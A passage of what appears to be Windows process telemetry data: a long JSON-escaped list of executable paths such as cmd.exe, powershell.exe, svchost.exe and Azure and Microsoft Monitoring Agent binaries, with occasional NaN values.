\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\